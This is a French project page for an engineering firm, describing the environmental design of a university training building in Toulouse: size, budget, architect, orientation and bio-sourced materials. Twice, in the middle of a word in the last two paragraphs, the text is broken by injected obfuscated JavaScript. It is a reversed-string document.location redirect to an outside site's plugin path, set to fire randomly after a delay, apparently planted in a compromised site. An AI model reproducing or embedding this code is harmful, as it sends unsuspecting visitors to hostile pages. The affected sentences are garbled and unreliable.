Lieu: Toulouse (31)
SHON: 10 600 m²
Montant des travaux: 21 500 000 € HT
Mission réalisée : Maîtrise d’Oeuvre Environnementale
Particularité :
Architecte: Séquences
Maître d’Ouvrage: Université Fédérale de Toulouse
Année : Début études Juin 2017
Portée par l’Opération Toulouse Campus de l’Université de Toulouse, la Maison de la Formation Jacqueline Auriol sera conçue sur le site de Montaudran et regroupera les étudiants de pôle Génie Mécanique de Toulouse (INSA, ISAE et IUT). Elle accueillera également un Pôle Recherche.
Associé au cabinet d’architectures SEQUENCES, F4 INGENIERIE a été nommé lauréat du concours.
Bien que contraints par certains aspects du projet (construction contre le bâtiment voisin), l’orientation Nord/Sud a été recherchée au maximum. Des sheds bénéficiant de cette orientation ont été placés sur les Ateliers.
Un important travail de conception a été réalisé afin de concevoir un projet agréable à vivre dont le confort visuel, thermique et acoustique est un véritable atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout pour les utilisateurs du bâtiment.
Enfin, le projet est inscrit dans une Démarche Environnementale globale, avec le choix de matériaux biosourcés, des espaces verts permettant un coefficient biotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tope élevé puis la mise en place d’un chantier vert